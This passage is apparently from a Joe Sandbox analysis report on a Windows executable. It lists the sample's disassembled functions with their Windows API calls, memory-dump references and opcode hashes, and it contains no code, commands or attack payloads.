Sleep.KERNEL32 ref: 00007FF6C74F5595
RaiseFailFastException.KERNEL32(?,?,?,00007FF6C75AE640), ref: 00007FF6C74F55C1
RaiseFailFastException.KERNEL32(?,?,?,00007FF6C75AE640), ref: 00007FF6C74F55FA

Strings

Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF6C74F55E6

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: ExceptionFailFastRaise$Sleep
String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
API String ID: 3706814929-926682358
Opcode ID: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
Instruction ID: 8aae1b039ec8fa81be3c64073e9cc92b63eb395a0c24d82108c8f3c4d39cab4d
Opcode Fuzzy Hash: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
Instruction Fuzzy Hash: A4415D32A19B4282EB90DF29E450369B3A1EF04B86F449039EACDC33A5DF3DE491C740

Function 00007FF6C74FBA80 Relevance: 6.0, APIs: 4, Instructions: 26
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF6C74FBAA1
SetThreadPriority.KERNELBASE ref: 00007FF6C74FBABD
ResumeThread.KERNELBASE ref: 00007FF6C74FBAC6
CloseHandle.KERNELBASE ref: 00007FF6C74FBACF

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Thread$CloseCreateHandlePriorityResume
String ID:
API String ID: 3633986771-0
Opcode ID: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
Instruction ID: 950182217ba9c8dd1120caf36c613684b3a8809062f60545813dd1279c734b2f
Opcode Fuzzy Hash: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
Instruction Fuzzy Hash: B1E06DA5E0574282EF199F22A8183356350BF99BD6F088034CDDE86360EF3C91899608

Function 00007FF6C7500E30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6C7500E67
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF6C7500F2C

Strings

@, xrefs: 00007FF6C7500F24

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CurrentGlobalMemoryProcessStatus
String ID: @
API String ID: 3261791682-2766056989
Opcode ID: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
Instruction ID: 5f470b80c2565e2da3994f25fbb2be79f5c4d6f465c9de4440da8176085bf049
Opcode Fuzzy Hash: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
Instruction Fuzzy Hash: F6412761B09B864AE956CF3691503399252AF49BC5F48C331ED8EB3744FF3CE4829A00

Function 00007FF6C75016E0 Relevance: 4.5, APIs: 3, Instructions: 34
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF6C75051C8,?,?,0000000A,00007FF6C7504220,?,?,00000000,00007FF6C74FDBB1), ref: 00007FF6C7501707
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF6C75051C8,?,?,0000000A,00007FF6C7504220,?,?,00000000,00007FF6C74FDBB1), ref: 00007FF6C7501727
VirtualAllocExNuma.KERNEL32 ref: 00007FF6C7501748

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: AllocVirtual$CurrentNumaProcess
String ID:
API String ID: 647533253-0
Opcode ID: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
Instruction ID: 2f3da90852c96aaf5272a29a87f1b13ab5afbfafe0d027dd81fd8159914876ff
Opcode Fuzzy Hash: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
Instruction Fuzzy Hash: 6BF0CD71B086D182EB208F06F40422AA760BB49FD6F484139EFCC57B68CF3DD6829B04

Function 00007FF6C750BFF0 Relevance: 3.4, APIs: 2, Instructions: 419
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DebugBreak.KERNEL32 ref: 00007FF6C750C3BC
DebugBreak.KERNEL32 ref: 00007FF6C750C56C

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 304407c2b0a443269d53732e37cbe3b30b34b672e901e56cea97d19dd57aff04
Instruction ID: 68143dc1780bc55fe05cf7fd033a4173ed1e3dedbeb59c279a39dd4f18758e41
Opcode Fuzzy Hash: 304407c2b0a443269d53732e37cbe3b30b34b672e901e56cea97d19dd57aff04
Instruction Fuzzy Hash: DF029072A09B8686EF608F25E4502B973A5FB46B8AF944136CACD877A4DF3DE451C340

Function 00007FF6C750759B Relevance: 3.1, APIs: 2, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00007FF6C75075FE
GetTickCount64.KERNEL32 ref: 00007FF6C7507683

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: 65d7cefa01567033c58624f5b2484fdd1bfa5fa806f089eb6f936ec28982fb97
Instruction ID: 44b68cc3ae717d51adb857866d7d6133390a5b82995a8bf2a4701842e5a237ec
Opcode Fuzzy Hash: 65d7cefa01567033c58624f5b2484fdd1bfa5fa806f089eb6f936ec28982fb97
Instruction Fuzzy Hash: DB416D35E0CBC28AFE648F3AE5452B92791BF0479BF854936D9CEC72A1DE3DE4419600

Function 00007FF6C755B610 Relevance: 3.0, APIs: 2, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6C755AC51,?,?,?,?,00007FF6C74FFCD1,?,?,?,00007FF6C7500254,00000000,00000020,?), ref: 00007FF6C755B62A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C755B640

Part of subcall function 00007FF6C755B924: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6C755B92D

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
String ID:
API String ID: 205171174-0
Opcode ID: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
Instruction ID: d683944ede370bc7883d3636fd5c88f15176cec9a904c191d4e1dd9bb3808343
Opcode Fuzzy Hash: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
Instruction Fuzzy Hash: 78E0E240E0924B01FDE92FA238AE0B861900F48372F9C1B30D9FE892C2ED1CA8968210

Function 00007FF6C74FBA40 Relevance: 3.0, APIs: 2, Instructions: 18
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF6C74FBA59
CloseHandle.KERNELBASE ref: 00007FF6C74FBA6C

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CloseCreateHandleThread
String ID:
API String ID: 3032276028-0
Opcode ID: afbd848b2ecd7790fe80cbff50474ccea25c37df90b3e86a6a037c059f69191f
Instruction ID: 56fd6e416a07a124593f7db332aa35ab1202025b50aab5ed5a07dda61ac58fa1
Opcode Fuzzy Hash: afbd848b2ecd7790fe80cbff50474ccea25c37df90b3e86a6a037c059f69191f
Instruction Fuzzy Hash: 93D012A5E0978182DE18DF72680112527D17B9CB85F848039D98DC3320FE3C92159904

Function 00007FF6C7517A30 Relevance: 2.6, APIs: 2, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C7532480: EnterCriticalSection.KERNEL32(?,?,?,00007FF6C7517A69,?,?,?,?,?,?,?,?,?,?,?,00007FF6C75292AB), ref: 00007FF6C75324C4
Part of subcall function 00007FF6C7532480: LeaveCriticalSection.KERNEL32(?,?,?,00007FF6C7517A69,?,?,?,?,?,?,?,?,?,?,?,00007FF6C75292AB), ref: 00007FF6C75324EE

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6C75292AB), ref: 00007FF6C7517B43
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6C75292AB), ref: 00007FF6C7517B64

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
Instruction ID: 3828d20855c4f9030d996bb2016a0c9f64c7c88cc7e4046a3a024a8e6850dce9
Opcode Fuzzy Hash: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
Instruction Fuzzy Hash: A3416961A08A4246EB108F3AE95027523A0AF15BFBF944739DAFDC76E8DF2CE445D340

Function 00007FF6C75008D0 Relevance: 2.6, APIs: 2, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FF6C7500944

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
Instruction ID: 44df2460a0a7cebe5a73b2909a116f65924cd3182a4d9502274e02c73a006b76
Opcode Fuzzy Hash: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
Instruction Fuzzy Hash: 8F31DF32B05B9282EA14CF16A50017A67A4FB49BD5F448536DF8C97B85DF38E5628340

Function 00007FF6C7532480 Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00007FF6C7517A69,?,?,?,?,?,?,?,?,?,?,?,00007FF6C75292AB), ref: 00007FF6C75324C4
LeaveCriticalSection.KERNEL32(?,?,?,00007FF6C7517A69,?,?,?,?,?,?,?,?,?,?,?,00007FF6C75292AB), ref: 00007FF6C75324EE

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
Instruction ID: 6ae26f955614a552f1610ae150b53ff64cd3639636e2e1d941c84385029f8211
Opcode Fuzzy Hash: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
Instruction Fuzzy Hash: B701A231D0CA9250FA209F16F9842B93794AF407EAF9A4031E9DDC39B5CE2CE885D740

Function 00007FF6C75016A0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FF6C75016B6
VirtualFree.KERNELBASE ref: 00007FF6C75016CC

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
Instruction ID: 87c67e0a18c7cfcbb889a34e72564eb6a7038c7d7d4238ce2eb1af7c983b517b
Opcode Fuzzy Hash: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
Instruction Fuzzy Hash: E2E0C234F1658286EF1C9F13AC4262522527F5AB82FC48038C48EC7350DE2DA51A9B00

Function 00007FF6C7512332 Relevance: 1.6, APIs: 1, Instructions: 150threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF6C751248C

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: ad288890ba912830cfd6e47479bd7d26f5505f4e4de79b909a34a810676dc6bb
Instruction ID: c39b13e0902ebff8657f34c5a2688cb07dfd87e2d01d1a8134ce097286786b9c
Opcode Fuzzy Hash: ad288890ba912830cfd6e47479bd7d26f5505f4e4de79b909a34a810676dc6bb
Instruction Fuzzy Hash: 1B618131F0D20786FA558F2AA85437426E4AF45797F988235D9EDC63E1DE3CE881EB00

Function 00007FF6C74F3260 Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

FlushProcessWriteBuffers.KERNEL32 ref: 00007FF6C74F32D5

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: ad24d787ae8aa8587738b62266e01dac9a375781b0ec3671b6e34412f745be72
Instruction ID: 983cd22e060c09554d1606ab489216348b4d1f44a0c8e2fbdcd5503a416ed788
Opcode Fuzzy Hash: ad24d787ae8aa8587738b62266e01dac9a375781b0ec3671b6e34412f745be72
Instruction Fuzzy Hash: 3641E722E0CA4387FA10EF26A5522BA5791BF45BD2F598031EECDC7786DE3DE4458340

Function 00007FF6C7592890 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF6C75927CF,?,?,00000030), ref: 00007FF6C75928E2

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d725e0b3d950bfd392393c993463a472c20741fc4ae74ea19a611fc2f3cf428b
Instruction ID: 7a79fce509c543d393c0071e401e8ebfa18b5eacf8a560188fe6c4355ebf2f45
Opcode Fuzzy Hash: d725e0b3d950bfd392393c993463a472c20741fc4ae74ea19a611fc2f3cf428b
Instruction Fuzzy Hash: 1E219522F0824294FB11EF629D526FE12A06F54799F94C035EECED6686DE3CE8878300

Function 00007FF6C74F4930 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C74FB6A0: GetCurrentThreadId.KERNEL32 ref: 00007FF6C74FB6A4

Part of subcall function 00007FF6C74FCA20: VirtualQuery.KERNEL32 ref: 00007FF6C74FCA52

RaiseFailFastException.KERNEL32 ref: 00007FF6C74F49B6

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
String ID:
API String ID: 2131581837-0
Opcode ID: bf9485ed3c33321e71670e355015b4487494b0548a5698c856176cffb278edfd
Instruction ID: 2c79edaa3dde5a9dc06f458b3541fae2b57a319cb6c2faacaceb1bbaa142f275
Opcode Fuzzy Hash: bf9485ed3c33321e71670e355015b4487494b0548a5698c856176cffb278edfd
Instruction Fuzzy Hash: 61112E72A0878282EB649F25B40519AB761FB457B0F548339E6FE477D6DF38D1468700

Function 00007FF6C74F56A0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00007FF6C74F56F1

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Event
